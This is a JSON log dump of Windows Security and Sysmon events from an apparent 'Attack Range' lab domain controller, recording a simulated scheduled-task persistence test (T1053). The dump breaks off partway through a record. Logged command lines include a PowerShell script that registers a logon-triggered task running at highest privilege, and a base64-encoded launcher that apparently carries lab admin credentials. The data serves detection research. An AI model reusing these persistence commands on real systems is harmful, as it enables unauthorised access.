{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220600,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E7\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t4\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x86057\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{DF6BBC2C-9F09-9001-5E0E-202CAB6F088A}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x474\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-8400769\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e7","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x86057","LogonType":"4","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-8400769","LogonGuid":"{DF6BBC2C-9F09-9001-5E0E-202CAB6F088A}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220601,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x86057\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x86057","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220602,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x86057\r\n\r\nLogon Type:\t\t\t4\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x86057","LogonType":"4","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5788,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.322\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.322","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5789,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.322\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.322","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5790,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: T1053\r\nUtcTime: 2020-08-01 06:55:19.322\r\nProcessGuid: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nProcessId: 1140\r\nImage: C:\\Windows\\system32\\svchost.exe\r\nTargetFilename: C:\\Windows\\System32\\Tasks\\Atomic task\r\nCreationUtcTime: 2020-08-01 06:55:19.322","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"T1053","UtcTime":"2020-08-01 06:55:19.322","ProcessGuid":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","Image":"C:\\Windows\\system32\\svchost.exe","TargetFilename":"C:\\Windows\\System32\\Tasks\\Atomic task","CreationUtcTime":"2020-08-01 06:55:19.322","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5791,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.354\r\nProcessGuid: {E2A3D6B1-11D7-5F25-0000-00107B610800}\r\nProcessId: 3864\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" & {$Action = New-ScheduledTaskAction -Execute \\\"\"calc.exe\\\"\"\n$Trigger = New-ScheduledTaskTrigger -AtLogon\n$User = New-ScheduledTaskPrincipal -GroupId \\\"\"BUILTIN\\Administrators\\\"\" -RunLevel Highest\n$Set = New-ScheduledTaskSettingsSet\n$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set\nRegister-ScheduledTask AtomicTask -InputObject $object} \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D4-5F25-0000-00205F0B0800}\r\nLogonId: 0x80B5F\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {E2A3D6B1-11D6-5F25-0000-00106A320800}\r\nParentProcessId: 4848\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgAkAG0AeQBBAHIAZwBzACAAPQAgAEAAewAgACIAdQBzAGUAcgBfAG4AYQBtAGUAIgAgAD0AIAAiAEEAVABUAEEAQwBLAFIAQQBOAEcARQBcAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgA7ACAAIgBwAGEAcwBzAHcAbwByAGQAIgAgAD0AIAAiAEkALQBsADEAawBlAC0AQQB0AHQAYQBjAGsALQBSAGEAbgBnAGUAIQAiACAAfQAKAEkAbgB2AG8AawBlAC0AQQB0AG8AbQBpAGMAVABlAHMAdAAgACIAVAAxADAANQAzAC4AMAAwADUAIgAgAC0ASQBuAHAAdQB0AEEAcgBnAHMAIAAkAG0AeQBBAHIAZwBzACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.354","ProcessGuid":"{E2A3D6B1-11D7-5F25-0000-00107B610800}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" &amp; {$Action = New-ScheduledTaskAction -Execute \\\"\"calc.exe\\\"\"\n$Trigger = New-ScheduledTaskTrigger -AtLogon\n$User = New-ScheduledTaskPrincipal -GroupId \\\"\"BUILTIN\\Administrators\\\"\" -RunLevel Highest\n$Set = New-ScheduledTaskSettingsSet\n$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set\nRegister-ScheduledTask AtomicTask -InputObject $object} ","CurrentDirectory":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D4-5F25-0000-00205F0B0800}","LogonId":"0x80b5f","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{E2A3D6B1-11D6-5F25-0000-00106A320800}","ParentProcessId":"4848","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgAkAG0AeQBBAHIAZwBzACAAPQAgAEAAewAgACIAdQBzAGUAcgBfAG4AYQBtAGUAIgAgAD0AIAAiAEEAVABUAEEAQwBLAFIAQQBOAEcARQBcAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgA7ACAAIgBwAGEAcwBzAHcAbwByAGQAIgAgAD0AIAAiAEkALQBsADEAawBlAC0AQQB0AHQAYQBjAGsALQBSAGEAbgBnAGUAIQAiACAAfQAKAEkAbgB2AG8AawBlAC0AQQB0AG8AbQBpAGMAVABlAHMAdAAgACIAVAAxADAANQAzAC4AMAAwADUAIgAgAC0ASQBuAHAAdQB0AEEAcgBnAHMAIAAkAG0AeQBBAHIAZwBzACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5792,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.354\r\nSourceProcessGUID: {E2A3D6B1-11D6-5F25-0000-00106A320800}\r\nSourceProcessId: 4848\r\nSourceThreadId: 1100\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-00107B610800}\r\nTargetProcessId: 3864\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffa4(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffa4(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffa4(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffa4(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+978635cf(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97863443(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+978e5c6f(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+9785c02b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98314fce(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97824823(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97882cf2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+978661e8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+9785816d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+978912fd(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 